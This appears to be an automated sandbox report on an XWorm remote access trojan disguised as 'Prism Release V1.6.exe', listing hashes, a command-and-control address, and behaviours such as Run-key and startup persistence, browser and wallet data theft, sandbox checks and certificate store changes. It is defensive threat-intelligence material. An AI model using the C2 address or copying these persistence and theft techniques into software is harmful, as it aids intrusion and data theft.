xworm | cee9d4132e0c5f98b5d84099c9f4a080b35e436174be8e5a59df1e8c7cae8fbd

Analysis

max time kernel
445s
max time network
462s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
15-06-2024 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prism Release V1.6.exe
Size

5.1MB
MD5

29056c6bb64b495974bfff8fdfd126dd
SHA1

0e6e6cb010b35fc8e48b5b3664b85beb07c06e34
SHA256

cee9d4132e0c5f98b5d84099c9f4a080b35e436174be8e5a59df1e8c7cae8fbd
SHA512

c5afea872ba62ed246a54f71b351791109d294752f7c69eb58b867fce696b9c4ecd9f9481f28677dc6c2ea68ea2cacbb302ef8183aaa91dd2fee05a7d70b602a
SSDEEP

98304:Dg4vUzghgparV16jIdGpD9Ii62SYRieom2/QzJgfODDm/RM:c4vFSApojIdGphd62aXizfDe

Score

10^/10

xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
Windows Runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\dllhost.exe	family_xworm
behavioral1/memory/2860-25-0x00000000008E0000-0x00000000008F8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4216	powershell.exe
1876	powershell.exe
4256	powershell.exe
2448	powershell.exe
2920	powershell.exe
4312	powershell.exe
3628	powershell.exe
4256	powershell.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

description ioc process

File created C:\Windows\System32\drivers\nldrv.sys

description	ioc	process
File created	C:\Windows\System32\drivers\nldrv.sys

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Prism Release V1.6.exedllhost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	Prism Release V1.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation

Drops startup file 5 IoCs

Processes:

dllhost.exetaskmgr.exesvchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\intel graphics processor.exe	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe

Executes dropped EXE 15 IoCs

Processes:

Prism.exedllhost.exenexusloader.exeWindows Runtime.exejdmlfb.exesvchost.exesvchost.exeWindows Runtime.exe

pid	process
5052	Prism.exe
2860	dllhost.exe
2152	nexusloader.exe
1304	Windows Runtime.exe
4752	jdmlfb.exe
4008	svchost.exe
1368	svchost.exe
4460	Windows Runtime.exe
616
1496
4568
3264
620
2688
1400

Loads dropped DLL 64 IoCs

Processes:

nexusloader.exesvchost.exesvchost.exe

pid	process
2152	nexusloader.exe
2152	nexusloader.exe
2152	nexusloader.exe
2152	nexusloader.exe
2152	nexusloader.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
4008	svchost.exe
1368	svchost.exe
1368	svchost.exe
1368	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

dllhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetLimiter = "\"C:\\Program Files\\Locktime Software\\NetLimiter\\nlclientapp.exe\" /minimized"
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe"	dllhost.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

description	ioc	process
File opened (read-only)	\??\P:
File opened (read-only)	\??\T:
File opened (read-only)	\??\M:
File opened (read-only)	\??\R:
File opened (read-only)	\??\W:
File opened (read-only)	\??\X:
File opened (read-only)	\??\P:
File opened (read-only)	\??\J:
File opened (read-only)	\??\S:
File opened (read-only)	\??\V:
File opened (read-only)	\??\N:
File opened (read-only)	\??\S:
File opened (read-only)	\??\Z:
File opened (read-only)	\??\O:
File opened (read-only)	\??\T:
File opened (read-only)	\??\K:
File opened (read-only)	\??\J:
File opened (read-only)	\??\Z:
File opened (read-only)	\??\G:
File opened (read-only)	\??\O:
File opened (read-only)	\??\U:
File opened (read-only)	\??\E:
File opened (read-only)	\??\R:
File opened (read-only)	\??\T:
File opened (read-only)	\??\E:
File opened (read-only)	\??\L:
File opened (read-only)	\??\Q:
File opened (read-only)	\??\M:
File opened (read-only)	\??\Y:
File opened (read-only)	\??\A:
File opened (read-only)	\??\H:
File opened (read-only)	\??\N:
File opened (read-only)	\??\X:
File opened (read-only)	\??\V:
File opened (read-only)	\??\Y:
File opened (read-only)	\??\L:
File opened (read-only)	\??\B:
File opened (read-only)	\??\Q:
File opened (read-only)	\??\E:
File opened (read-only)	\??\I:
File opened (read-only)	\??\K:
File opened (read-only)	\??\X:
File opened (read-only)	\??\L:
File opened (read-only)	\??\P:
File opened (read-only)	\??\M:
File opened (read-only)	\??\Z:
File opened (read-only)	\??\S:
File opened (read-only)	\??\W:
File opened (read-only)	\??\U:
File opened (read-only)	\??\B:
File opened (read-only)	\??\H:
File opened (read-only)	\??\O:
File opened (read-only)	\??\B:
File opened (read-only)	\??\J:
File opened (read-only)	\??\R:
File opened (read-only)	\??\Y:
File opened (read-only)	\??\G:
File opened (read-only)	\??\W:
File opened (read-only)	\??\G:
File opened (read-only)	\??\K:
File opened (read-only)	\??\Q:
File opened (read-only)	\??\U:
File opened (read-only)	\??\N:
File opened (read-only)	\??\V:

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
76 api.ipify.org
77 api.ipify.org
78 ipinfo.io
79 ipinfo.io

flow	ioc
1	ip-api.com
76	api.ipify.org
77	api.ipify.org
78	ipinfo.io
79	ipinfo.io

Drops file in Program Files directory 64 IoCs

Processes:

description	ioc	process
File created	C:\Program Files\Locktime Software\NetLimiter\System.Net.Sockets.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Buffers.dll
File created	C:\Program Files\Locktime Software\NetLimiter\Microsoft.Extensions.DependencyInjection.Abstractions.dll
File created	C:\Program Files\Locktime Software\NetLimiter\pt-br\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\ko\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Collections.NonGeneric.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe
File created	C:\Program Files\Locktime Software\NetLimiter\System.IO.UnmanagedMemoryStream.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Algorithms.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Threading.ThreadPool.dll
File created	C:\Program Files\Locktime Software\NetLimiter\hi\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.AppContext.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Debug.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe
File created	C:\Program Files\Locktime Software\NetLimiter\System.IO.Pipes.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Linq.Queryable.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.CompilerServices.VisualC.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config
File created	C:\Program Files\Locktime Software\NetLimiter\NLInterop.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe
File created	C:\Program Files\Locktime Software\NetLimiter\FamFamFam.Flags.Wpf.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLSvcCliCnnCheck.exe
File created	C:\Program Files\Locktime Software\NetLimiter\System.Linq.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Numerics.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Globalization.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Net.Security.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Resources.Reader.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Json.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Threading.Timer.dll
File created	C:\Program Files\Locktime Software\NetLimiter\Xceed.Wpf.Toolkit.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Console.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.TraceSource.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.dll
File created	C:\Program Files\Locktime Software\NetLimiter\Newtonsoft.Json.dll
File opened for modification	C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config
File created	C:\Program Files\Locktime Software\NetLimiter\NetLimiter.Runtime.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.IO.FileSystem.Primitives.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Reflection.Extensions.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Threading.Thread.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Security.Claims.dll
File created	C:\Program Files\Locktime Software\NetLimiter\es\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Drawing.Primitives.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Net.WebSockets.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Primitives.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Security.SecureString.dll
File created	C:\Program Files\Locktime Software\NetLimiter\Microsoft.Win32.TaskScheduler.dll
File created	C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe.config
File created	C:\Program Files\Locktime Software\NetLimiter\System.Data.Common.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.ValueTuple.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.InteropServices.dll
File created	C:\Program Files\Locktime Software\NetLimiter\ports.bin
File created	C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe.nlog
File created	C:\Program Files\Locktime Software\NetLimiter\System.Net.NameResolution.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Contracts.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Threading.Tasks.Parallel.dll
File created	C:\Program Files\Locktime Software\NetLimiter\CoreLibNet.dll
File created	C:\Program Files\Locktime Software\NetLimiter\tr\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\zh-hant\NLClientApp.Core.resources.dll
File created	C:\Program Files\Locktime Software\NetLimiter\IPAddressRange.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Process.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Xml.dll
File created	C:\Program Files\Locktime Software\NetLimiter\ScottPlot.WPF.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Numerics.Vectors.dll
File created	C:\Program Files\Locktime Software\NetLimiter\System.Resources.Writer.dll

Drops file in Windows directory 25 IoCs

Processes:

description	ioc	process
File opened for modification	C:\Windows\Installer\e5ce49b.msi
File opened for modification	C:\Windows\Installer\MSIED01.tmp
File opened for modification	C:\Windows\Installer\MSIE6F0.tmp
File opened for modification	C:\Windows\Installer\MSIE720.tmp
File created	C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
File opened for modification	C:\Windows\Installer\
File created	C:\Windows\Installer\inprogressinstallinfo.ipi
File opened for modification	C:\Windows\Installer\MSIED00.tmp
File opened for modification	C:\Windows\Installer\MSIECD0.tmp
File opened for modification	C:\Windows\Installer\MSIF39A.tmp
File opened for modification	C:\Windows\Installer\MSIA33.tmp
File opened for modification	C:\Windows\Installer\MSIEADA.tmp
File opened for modification	C:\Windows\Installer\MSIA54.tmp
File created	C:\Windows\Installer\e5ce49b.msi
File opened for modification	C:\Windows\Installer\MSIE643.tmp
File created	C:\Windows\Installer\SourceHash{63BC5994-B37B-4416-A29E-B2D208BD5CAE}
File opened for modification	C:\Windows\Installer\MSIF34B.tmp
File opened for modification	C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe
File opened for modification	C:\Windows\Installer\MSIA22.tmp
File opened for modification	C:\Windows\Installer\MSIE585.tmp
File opened for modification	C:\Windows\Installer\MSIE603.tmp
File opened for modification	C:\Windows\Installer\MSIEBB5.tmp
File opened for modification	C:\Windows\Installer\MSIA23.tmp
File opened for modification	C:\Windows\Installer\MSIF716.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000043e29724379355490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000043e297240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090043e29724000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d43e29724000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000043e2972400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2240 schtasks.exe

pid	process
2240	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1644	taskkill.exe
2492
5000
2020	taskkill.exe
384
1400
4588
4920	taskkill.exe
3960	taskkill.exe
2376
1572
464	taskkill.exe
2636	taskkill.exe
4380	taskkill.exe
4156
1212
3716
5024	taskkill.exe
2832	taskkill.exe
3496
452
4192
4440
2972	taskkill.exe
4384	taskkill.exe
532
1568
4028
4784
4500
4984
3380
4572
400
1284
4744
2320	taskkill.exe
832	taskkill.exe
4476
404
3776
3044	taskkill.exe
1104
4920
748
2980
2472
3096	taskkill.exe
4332
3032
3192
1588
2688	taskkill.exe
1580
4188	taskkill.exe
676
1104
3396
2552	taskkill.exe
3144	taskkill.exe
3168
3864
1892
2396

Modifies data under HKEY_USERS 6 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629162826089912"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E

Modifies registry class 36 IoCs

Processes:

nexusloader.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	nexusloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	nexusloader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	nexusloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	nexusloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	nexusloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	nexusloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	nexusloader.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8
